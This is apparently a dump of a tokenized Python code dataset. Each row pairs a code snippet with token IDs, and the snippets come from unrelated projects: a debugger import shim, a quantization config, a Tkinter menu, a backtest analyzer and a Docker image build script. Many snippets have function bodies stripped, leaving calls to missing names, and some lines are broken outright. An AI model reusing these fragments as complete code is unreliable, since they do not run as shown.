import sys try: try: from _pydevd_bundle_ext import pydevd_cython as mod except ImportError: from _pydevd_bundle import pydevd_cython as mod except ImportError: import struct try: is_python_64bit = (struct.calcsize('P') == 8) except: # In Jython this call fails, but this is Ok, we don't support Jython for speedups anyways. raise ImportError plat = '32' if is_python_64bit: plat = '64' # We also accept things as: # # _pydevd_bundle.pydevd_cython_win32_27_32 # _pydevd_bundle.pydevd_cython_win32_34_64 # # to have multiple pre-compiled pyds distributed along the IDE # (generated by build_tools/build_binaries_windows.py). mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat) check_name = '_pydevd_bundle.%s' % (mod_name,) mod = getattr(__import__(check_name), mod_name) # Regardless of how it was found, make sure it's later available as the # initial name so that the expected types from cython in frame eval # are valid. sys.modules['_pydevd_bundle.pydevd_cython'] = mod trace_dispatch = mod.trace_dispatch PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo set_additional_thread_info = mod.set_additional_thread_info global_cache_skips = mod.global_cache_skips global_cache_frame_skips = mod.global_cache_frame_skips _set_additional_thread_info_lock = mod._set_additional_thread_info_lock fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func version = getattr(mod, 'version', 0)
[ 11748, 25064, 201, 198, 28311, 25, 201, 198, 220, 220, 220, 1949, 25, 201, 198, 220, 220, 220, 220, 220, 220, 220, 422, 4808, 79, 5173, 1990, 67, 62, 65, 31249, 62, 2302, 1330, 279, 5173, 1990, 67, 62, 948, 400, 261, 355, 953, 2...
2.320225
712
from tests.fixtures import api, PROJECT_NAME assert api THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent" THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
[ 6738, 5254, 13, 69, 25506, 1330, 40391, 11, 21965, 23680, 62, 20608, 198, 198, 30493, 40391, 628, 198, 4221, 5883, 33, 62, 26947, 16, 796, 275, 1, 5661, 9160, 548, 25120, 400, 20566, 11299, 1, 198, 4221, 5883, 33, 62, 26947, 17, 796...
2.672131
61
# Generalizando para no repetir o cdigo!
[ 2, 3611, 528, 25440, 31215, 645, 46152, 343, 267, 269, 12894, 78, 0, 628 ]
3
14
""" Copyright (c) 2022 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype from nncf.common.graph.operator_metatypes import UnknownMetatype DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = { QuantizationTrait.INPUTS_QUANTIZABLE: [ ONNXConvolutionMetatype, ONNXLinearMetatype, ONNXAveragePoolMetatype, ONNXGlobalAveragePoolMetatype, ONNXAddLayerMetatype, ONNXMulLayerMetatype, ONNXBatchNormMetatype, ONNXHardSigmoidMetatype, ONNXResizeMetatype, ], QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype, ONNXSoftmaxMetatype, UnknownMetatype], QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype], QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: [] }
[ 37811, 198, 15069, 357, 66, 8, 33160, 8180, 10501, 198, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 921, 743, 7...
2.470041
968
import ops import iopc TARBALL_FILE="samba-4.8.4.tar.gz" TARBALL_DIR="samba-4.8.4" INSTALL_DIR="samba-bin" pkg_path = "" output_dir = "" tarball_pkg = "" tarball_dir = "" install_dir = "" install_tmp_dir = "" cc_host = "" tmp_include_dir = "" dst_include_dir = "" dst_lib_dir = "" dst_usr_local_lib_dir = ""
[ 11748, 39628, 198, 11748, 1312, 404, 66, 198, 198, 51, 37304, 7036, 62, 25664, 2625, 82, 31842, 12, 19, 13, 23, 13, 19, 13, 18870, 13, 34586, 1, 198, 51, 37304, 7036, 62, 34720, 2625, 82, 31842, 12, 19, 13, 23, 13, 19, 1, 198, ...
2.190141
142
# -*- coding: utf-8 -*- # # michael a.g. avzis # orthologue # (c) 1998-2019 all rights reserved # # declaration # end of file
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 285, 40302, 257, 13, 70, 13, 1196, 89, 271, 198, 2, 29617, 39795, 198, 2, 357, 66, 8, 7795, 12, 23344, 477, 2489, 10395, 198, 2, 628, 198, 2, 14305, 6...
2.407407
54
import os x = 7 print(x + 1)
[ 11748, 28686, 198, 198, 87, 796, 767, 198, 4798, 7, 87, 1343, 352, 8, 198 ]
2
15
#! /usr/bin/env python3 # -*- coding: utf-8 -*- import math print(int(1.9,9.7))
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 10688, 198, 198, 4798, 7, 600, 7, 16, 13, 24, 11, 24, 13, 22, 4008, 198 ]
1.906977
43
from almetro.instance import growing from almetro.metro import Metro import timeit
[ 6738, 435, 4164, 305, 13, 39098, 1330, 3957, 198, 6738, 435, 4164, 305, 13, 4164, 305, 1330, 12477, 198, 11748, 640, 270, 628, 628 ]
3.583333
24
# coding: utf-8 from __future__ import unicode_literals import re import json from .common import InfoExtractor from .youtube import YoutubeIE, YoutubeBaseInfoExtractor from ..compat import ( compat_urllib_parse_unquote, compat_urllib_parse_unquote_plus, compat_HTTPError ) from ..utils import ( bug_reports_message, clean_html, dict_get, extract_attributes, ExtractorError, get_element_by_id, HEADRequest, int_or_none, KNOWN_EXTENSIONS, merge_dicts, mimetype2ext, orderedSet, parse_duration, parse_qs, str_to_int, str_or_none, traverse_obj, try_get, unified_strdate, unified_timestamp, urlhandle_detect_ext, url_or_none )
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 11748, 302, 198, 11748, 33918, 198, 6738, 764, 11321, 1330, 14151, 11627, 40450, 198, 6738, 764, 11604, 1330, 27431, 10008, 11, ...
2.380328
305
# Interfas Grafica XI # Menu from tkinter import * root=Tk() barraMenu=Menu(root) root.config(menu=barraMenu, width=600, height=400) archivoMenu=Menu(barraMenu, tearoff=0) archivoMenu.add_command(label="Nuevo") archivoMenu.add_command(label="Guardar") archivoMenu.add_command(label="Guardar Como") archivoMenu.add_separator() archivoMenu.add_command(label="Cerrar") archivoMenu.add_command(label="Salir") archivoEdicion=Menu(barraMenu, tearoff=0) archivoHerramientas=Menu(barraMenu) archivoEdicion.add_command(label="Copiar") archivoEdicion.add_command(label="Cortar") archivoEdicion.add_command(label="Pegar") archivoAyuda=Menu(barraMenu, tearoff=0) barraMenu.add_cascade(label="Archivo", menu=archivoMenu) barraMenu.add_cascade(label="Edicion", menu=archivoEdicion) barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas) barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda) archivoAyuda.add_command(label="Licencia") archivoAyuda.add_command(label="Acerca de...") root.mainloop()
[ 2, 4225, 69, 292, 7037, 69, 3970, 30554, 198, 2, 21860, 628, 198, 6738, 256, 74, 3849, 1330, 1635, 198, 198, 15763, 28, 51, 74, 3419, 198, 198, 5657, 430, 23381, 28, 23381, 7, 15763, 8, 198, 15763, 13, 11250, 7, 26272, 28, 5657, ...
2.618182
385
# Copyright 2017 Canonical Ltd. # Licensed under the LGPLv3, see LICENCE file for details.
[ 2, 15069, 2177, 19507, 605, 12052, 13, 198, 2, 49962, 739, 262, 17370, 6489, 85, 18, 11, 766, 38559, 18310, 2393, 329, 3307, 13, 198 ]
3.64
25
# -*- coding: UTF-8 -*- import psycopg2 #postgresql import time import datetime if __name__ == "__main__": pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456") print("===========insert_one==============") pg.insert_one("wong", 1) print("===========query_all==============") pg.query_all() print("===========query_lastone==============") pg.query_lastone() print("===========query_byname==============") pg.query_byname("catcher") print("===========update_genderbyid==============") pg.update_genderbyid(4, 2) print("===========delete_byname==============") pg.delete_byname("wong") print("===========query_all==============") pg.query_all()
[ 2, 532, 9, 12, 19617, 25, 41002, 12, 23, 532, 9, 12, 201, 198, 201, 198, 11748, 17331, 22163, 70, 17, 220, 1303, 7353, 34239, 13976, 201, 198, 11748, 640, 201, 198, 11748, 4818, 8079, 220, 201, 198, 201, 198, 361, 11593, 3672, 834...
2.361111
324
#! /usr/bin/env python import nmrglue as ng # read in the varian data dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2") # Set the parameters u = ng.pipe.guess_udic(dic,data) # create the converter object and initilize with varian data C = ng.convert.converter() C.from_pipe(dic,data,u) # create pipe data and then write it out ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True) # check the conversion against NMRPipe print "Conversion complete, listing differences between files:" sdic,sdata = ng.sparky.read("2d_sparky.ucsf") sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf") print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28642, 81, 4743, 518, 355, 23370, 198, 198, 2, 1100, 287, 262, 1401, 666, 1366, 198, 67, 291, 11, 7890, 796, 23370, 13, 34360, 13, 961, 7203, 40720, 11321, 62, 7890, ...
2.50365
274
# encoding: utf-8 from __future__ import print_function import os import json from collections import OrderedDict import numpy as np import pandas as pd import matplotlib as mpl import matplotlib.pyplot as plt from matplotlib.ticker import Formatter from jaqs.trade.analyze.report import Report from jaqs.data import RemoteDataService from jaqs.data.basic.instrument import InstManager from jaqs.trade import common import jaqs.util as jutil STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static") TO_PCT = 100.0 MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6', 'axes.facecolor': '#F6F6F6', 'axes.edgecolor': '#D3D3D3', 'text.color': '#555555', 'grid.color': '#B1B1B1', 'grid.alpha': 0.3, # scale 'axes.linewidth': 2.0, 'axes.titlepad': 12, 'grid.linewidth': 1.0, 'grid.linestyle': '-', # font size 'font.size': 13, 'axes.titlesize': 18, 'axes.labelsize': 14, 'legend.fontsize': 'small', 'lines.linewidth': 2.5, } def _init_inst_data(self): symbol_str = ','.join(self.universe) if self.dataview is not None: data_inst = self.dataview.data_inst self.inst_map = data_inst.to_dict(orient='index') elif self.data_api is not None: inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str) self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()} del inst_mgr else: raise ValueError("no dataview or dataapi provided.") def _init_trades(self, df): """Add datetime column. """ df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time']) df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0) # self._trades = jutil.group_df_to_dict(df, by='symbol') self._trades = df def _init_symbol_price(self): """Get close price of securities in the universe from data server.""" if self.dataview is not None: df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date) df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date) else: df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close', start_date=self.start_date, end_date=self.end_date) if msg != '0,': print(msg) df_close = df.pivot(index='trade_date', columns='symbol', values='close') df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close', start_date=self.start_date, end_date=self.end_date) if msg != '0,': print(msg) df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close') self._closes = df_close self._closes_adj = df_close_adj def _init_universe(self, securities): """Return a set of securities.""" self._universe = set(securities) def _init_configs(self, folder): import codecs with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f: configs = json.load(f) self._configs = configs self.init_balance = self.configs['init_balance'] self.start_date = self.configs['start_date'] self.end_date = self.configs['end_date'] ''' def get_daily(self): """Add various statistics to daily DataFrame.""" self.daily = self._get_daily(self.closes, self.trades) daily_dic = dict() for sec, df_trade in self.trades.items(): df_close = self.closes[sec].rename('close') res = self._get_daily(df_close, df_trade) daily_dic[sec] = res self.daily = daily_dic ''' def gen_report(self, source_dir, template_fn, out_folder='.', selected=None): """ Generate HTML (and PDF) report of the trade analysis. Parameters ---------- source_dir : str path of directory where HTML template and css files are stored. template_fn : str File name of HTML template. out_folder : str Output folder of report. selected : list of str or None List of symbols whose detailed PnL curve and position will be plotted. # TODO: this parameter should not belong to function """ dic = dict() dic['html_title'] = "Alpha Strategy Backtest Result" dic['selected_securities'] = selected # we do not want to show username / password in report dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)} dic['performance_metrics'] = self.performance_metrics dic['risk_metrics'] = self.risk_metrics dic['position_change'] = self.position_change dic['account'] = self.account dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol') dic['daily_position'] = self.daily_position self.report_dic.update(dic) self.returns.to_csv(os.path.join(out_folder, 'returns.csv')) r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder) r.generate_html() r.output_html('report.html') class EventAnalyzer(BaseAnalyzer): class AlphaAnalyzer(BaseAnalyzer): ''' def get_returns_OLD(self, compound_return=True, consider_commission=True): profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit' vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()} df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit # TODO temperary solution df_profit = df_profit.fillna(method='ffill').fillna(0.0) strategy_value = df_profit.sum(axis=1) + self.configs['init_balance'] market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill') market_values.columns = ['strat', 'bench'] df_returns = market_values.pct_change(periods=1).fillna(0.0) df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum') if compound_return: df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1 df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0) else: df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench'] df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0) start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d") end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d") years = (end - start).days / 365.0 self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1 self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.) self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1] self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol'] # bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date') # df_returns = df_returns.join(bt_strat_mv, how='right') self.returns = df_returns ''' def _brinson(self, close, pos, index_weight, group): """ Brinson Attribution. Parameters ---------- close : pd.DataFrame Index is date, columns are symbols. pos : pd.DataFrame Index is date, columns are symbols. index_weight : pd.DataFrame Index is date, columns are symbols. group : pd.DataFrame Index is date, columns are symbols. Returns ------- dict """ ret = close.pct_change(1) pos_sum = pos.sum(axis=1) pf_weight = pos.div(pos_sum, axis=0) pf_weight.loc[pos_sum == 0, :] = 0.0 assert pf_weight.isnull().sum().sum() == 0 pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns) pf_weight = pf_weight.fillna(0.0) weighted_ret_pf = ret.mul(pf_weight) weighted_ret_index = ret.mul(index_weight) index_group_weight = group_sum(index_weight, group) pf_group_weight = group_sum(pf_weight, group) pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight) index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight) allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret) allo_ret = allo_ret_group.sum(axis=1) selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight) selection_ret = selection_ret_group.sum(axis=1) active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1)) inter_ret = active_ret - selection_ret - allo_ret df_brinson = pd.DataFrame(index=allo_ret.index, data={'allocation': allo_ret, 'selection': selection_ret, 'interaction': inter_ret, 'total_active': active_ret}) return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group} def brinson(self, group): """ Parameters ---------- group : str or pd.DataFrame If group is string, this function will try to fetch the corresponding DataFrame from DataView. If group is pd.DataFrame, it will be used as-is. Returns ------- """ if isinstance(group, str): group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date) elif isinstance(group, pd.DataFrame): pass else: raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group)) if group is None or group.empty: raise ValueError("group is None or group is empty") close = self.closes_adj pos = self.daily_position index_weight = self._get_index_weight() res_dic = self._brinson(close, pos, index_weight, group) df_brinson = res_dic['df_brinson'] self.df_brinson = df_brinson self.report_dic['df_brinson'] = df_brinson plot_brinson(df_brinson, save_folder=self.file_folder) def plot_daily_trading_holding_pnl(trading, holding, total, total_cum): """ Parameters ---------- Series """ idx0 = total.index n = len(idx0) idx = np.arange(n) fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True) ax1 = ax0.twinx() bar_width = 0.4 profit_color, lose_color = '#D63434', '#2DB635' curve_color = '#174F67' y_label = 'Profit / Loss ($)' color_arr_raw = np.array([profit_color] * n) color_arr = color_arr_raw.copy() color_arr[total < 0] = lose_color ax0.bar(idx, total, width=bar_width, color=color_arr) ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],) ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d')) ax1.plot(idx, total_cum, lw=1.5, color=curve_color) ax1.set(ylabel='Cum. ' + y_label) ax1.yaxis.label.set_color(curve_color) color_arr = color_arr_raw.copy() color_arr[trading < 0] = lose_color ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr) ax2.set(title='Daily Trading PnL', ylabel=y_label) color_arr = color_arr_raw.copy() color_arr[holding < 0] = lose_color ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr) ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10]) return fig def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret): """ Parameters ---------- Series """ fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True) idx_dt = portfolio_cum_ret.index idx = np.arange(len(idx_dt)) y_label_ret = "Cumulative Return (%)" ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67') ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6') ax1.legend(loc='upper left') ax1.set(title="Absolute Return of Portfolio and Benchmark", #xlabel="Date", ylabel=y_label_ret) ax1.grid(axis='y') ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051') ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret #xlabel="Date", ) ax2.grid(axis='y') ax2.xaxis.set_major_formatter(MyFormatter(idx_dt, '%y-%m-%d')) # 17-09-31 fig.tight_layout() return fig def plot_brinson(df, save_folder): """ Parameters ---------- df : pd.DataFrame """ allo, selec, inter, total = df['allocation'], df['selection'], df['interaction'], df['total_active'] fig, ax1 = plt.subplots(1, 1, figsize=(21, 8)) idx0 = df.index idx = range(len(idx0)) ax1.plot(idx, selec, lw=1.5, color='indianred', label='Selection Return') ax1.plot(idx, allo, lw=1.5, color='royalblue', label='Allocation Return') ax1.plot(idx, inter, lw=1.5, color='purple', label='Interaction Return') # ax1.plot(idx, total, lw=1.5, ls='--', color='k', label='Total Active Return') ax1.axhline(0.0, color='k', lw=0.5, ls='--') ax1.legend(loc='upper left') ax1.set_xlabel("Date") ax1.set_ylabel("Return") ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m-%d')) plt.tight_layout() fig.savefig(os.path.join(save_folder, 'brinson_attribution.png')) plt.close() def calc_avg_pos_price(pos_arr, price_arr): """ Calculate average cost price using position and fill price. When position = 0, cost price = symbol price. """ assert len(pos_arr) == len(price_arr) avg_price = np.zeros_like(pos_arr, dtype=float) avg_price[0] = price_arr[0] for i in range(pos_arr.shape[0] - 1): if pos_arr[i+1] == 0: avg_price[i+1] = 0.0 else: pos_diff = pos_arr[i+1] - pos_arr[i] if pos_arr[i] == 0 or pos_diff * pos_arr[i] > 0: count = True else: count = False if count: avg_price[i+1] = (avg_price[i] * pos_arr[i] + pos_diff * price_arr[i+1]) * 1. / pos_arr[i+1] else: avg_price[i+1] = avg_price[i] return avg_price def plot_trades(df, symbol="", save_folder='.', marker_size_adjust_ratio=0.1): old_mpl_rcparams = {k: v for k, v in mpl.rcParams.items()} mpl.rcParams.update(MPL_RCPARAMS) idx0 = df.index idx = range(len(idx0)) price = df.loc[:, 'close'] bv, sv = df.loc[:, 'BuyVolume'].values, df.loc[:, 'SellVolume'].values profit = df.loc[:, 'CumProfit'].values avgpx = df.loc[:, 'AvgPosPrice'] bv_m = np.max(bv) sv_m = np.max(sv) if bv_m > 0: bv = bv / bv_m * 100 if sv_m > 0: sv = sv / sv_m * 100 fig = plt.figure(figsize=(14, 10)) ax1 = plt.subplot2grid((4, 1), (0, 0), rowspan=3) ax3 = plt.subplot2grid((4, 1), (3, 0), rowspan=1, sharex=ax1) ax2 = ax1.twinx() ax1.plot(idx, price, label='Price', linestyle='-', lw=1, marker='', color='yellow') ax1.scatter(idx, price, label='buy', marker='o', s=bv, color='indianred') ax1.scatter(idx, price, label='sell', marker='o', s=sv, color='forestgreen') ax1.plot(idx, avgpx, lw=1, marker='', color='green') ax1.legend(loc='upper left') ax1.set(title="Price, Trades and PnL for {:s}".format(symbol), ylabel="Price ($)") ax1.xaxis.set_major_formatter(MyFormatter(idx0, '%Y-%m')) ax2.plot(idx, profit, label='PnL', color='k', lw=1, ls='--', alpha=.4) ax2.legend(loc='upper right') ax2.set(ylabel="Profit / Loss ($)") # ax1.xaxis.set_major_formatter(MyFormatter(df.index))#, '%H:%M')) ax3.plot(idx, df.loc[:, 'position'], marker='D', markersize=3, lw=2) ax3.axhline(0, color='k', lw=1, ls='--', alpha=0.8) ax3.set(title="Position of {:s}".format(symbol)) fig.tight_layout() fig.savefig(save_folder + '/' + "{}.png".format(symbol), facecolor=fig.get_facecolor(), dpi=fig.get_dpi()) mpl.rcParams.update(old_mpl_rcparams)
[ 2, 21004, 25, 3384, 69, 12, 23, 198, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 28686, 198, 11748, 33918, 198, 6738, 17268, 1330, 14230, 1068, 35, 713, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 2...
2.048581
8,419
# # Lightnet data transforms # Copyright EAVISE # from .pre import * from .post import * from .util import *
[ 2, 198, 2, 220, 220, 4401, 3262, 1366, 31408, 198, 2, 220, 220, 15069, 412, 10116, 24352, 198, 2, 198, 198, 6738, 764, 3866, 1330, 1635, 198, 6738, 764, 7353, 1330, 1635, 198, 6738, 764, 22602, 1330, 1635, 198 ]
2.923077
39
from rest_framework import status from rest_framework.exceptions import APIException
[ 6738, 1334, 62, 30604, 1330, 3722, 198, 6738, 1334, 62, 30604, 13, 1069, 11755, 1330, 7824, 16922, 628 ]
4.777778
18
#!/usr/bin/env python3 # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Manages IREE Docker image definitions. Includes information on their dependency graph and GCR URL. Example usage: Rebuild the cmake image and all images that transitiviely on depend on it, tagging them with `latest`: python3 build_tools/docker/manage_images.py --build --image cmake Print out output for rebuilding the cmake image and all images that transitiviely on depend on it, but don't take side-effecting actions: python3 build_tools/docker/manage_images.py --build --image cmake --dry-run Push all `prod` images to GCR: python3 build_tools/docker/manage_images.py --push --tag prod --images all Rebuild and push all images and update references to them in the repository: python3 build_tools/docker/manage_images.py --push --images all --update-references """ import argparse import fileinput import os import posixpath import re import subprocess import sys IREE_GCR_URL = 'gcr.io/iree-oss/' DOCKER_DIR = 'build_tools/docker/' # Map from image names to images that they depend on. IMAGES_TO_DEPENDENCIES = { 'base': [], 'bazel': ['base', 'util'], 'bazel-python': ['bazel'], 'bazel-tensorflow': ['bazel-python'], 'bazel-tensorflow-nvidia': ['bazel-tensorflow-vulkan'], 'bazel-tensorflow-swiftshader': ['bazel-tensorflow-vulkan', 'swiftshader'], 'bazel-tensorflow-vulkan': ['bazel-tensorflow'], 'cmake': ['base', 'util'], 'cmake-android': ['cmake', 'util'], 'cmake-python': ['cmake'], 'cmake-python-nvidia': ['cmake-python-vulkan'], 'cmake-python-swiftshader': ['cmake-python-vulkan', 'swiftshader'], 'cmake-python-vulkan': ['cmake-python'], 'rbe-toolchain': [], 'swiftshader': ['cmake'], 'util': [], } IMAGES_TO_DEPENDENT_IMAGES = {k: [] for k in IMAGES_TO_DEPENDENCIES} for image, dependencies in IMAGES_TO_DEPENDENCIES.items(): for dependency in dependencies: IMAGES_TO_DEPENDENT_IMAGES[dependency].append(image) IMAGES_HELP = [f'`{name}`' for name in IMAGES_TO_DEPENDENCIES] IMAGES_HELP = f'{", ".join(IMAGES_HELP)} or `all`' def parse_arguments(): """Parses command-line options.""" parser = argparse.ArgumentParser( description="Build IREE's Docker images and optionally push them to GCR.") parser.add_argument( '--images', '--image', type=str, required=True, action='append', help=f'Name of the image to build: {IMAGES_HELP}.') parser.add_argument( '--tag', type=str, default='latest', help='Tag for the images to build. Defaults to `latest` (which is good ' 'for testing changes in a PR). Use `prod` to update the images that the ' 'CI caches.') parser.add_argument( '--pull', action='store_true', help='Pull the specified image before building.') parser.add_argument( '--build', action='store_true', help='Build new images from the current Dockerfiles.') parser.add_argument( '--push', action='store_true', help='Push the built images to GCR. Requires gcloud authorization.') parser.add_argument( '--update_references', '--update-references', action='store_true', help='Update all references to the specified images to point at the new' ' digest.') parser.add_argument( '--dry_run', '--dry-run', '-n', action='store_true', help='Print output without building or pushing any images.') args = parser.parse_args() for image in args.images: if image == 'all': # Sort for a determinstic order args.images = sorted(IMAGES_TO_DEPENDENCIES.keys()) elif image not in IMAGES_TO_DEPENDENCIES: raise parser.error('Expected --image to be one of:\n' f' {IMAGES_HELP}\n' f'but got `{image}`.') return args if __name__ == '__main__': args = parse_arguments() # Ensure the user has the correct authorization if they try to push to GCR. if args.push: if stream_command(['which', 'gcloud']) != 0: print('gcloud not found.' ' See https://cloud.google.com/sdk/install for installation.') sys.exit(1) check_stream_command(['gcloud', 'auth', 'configure-docker'], dry_run=args.dry_run) images_to_process = get_ordered_images_to_process(args.images) print(f'Also processing dependent images. Will process: {images_to_process}') for image in images_to_process: print(f'Processing image {image}') image_name = posixpath.join(IREE_GCR_URL, image) image_tag = f'{image_name}:{args.tag}' image_path = os.path.join(DOCKER_DIR, image) if args.pull: check_stream_command(['docker', 'pull', image_tag], dry_run=args.dry_run) if args.build: check_stream_command(['docker', 'build', '--tag', image_tag, image_path], dry_run=args.dry_run) if args.push: check_stream_command(['docker', 'push', image_tag], dry_run=args.dry_run) if args.update_references: digest = get_repo_digest(image_tag) # Just hardcode this oddity if image == 'rbe-toolchain': update_rbe_reference(digest, dry_run=args.dry_run) update_references(image_name, digest, dry_run=args.dry_run)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 2, 15069, 12131, 3012, 11419, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2...
2.613381
2,227
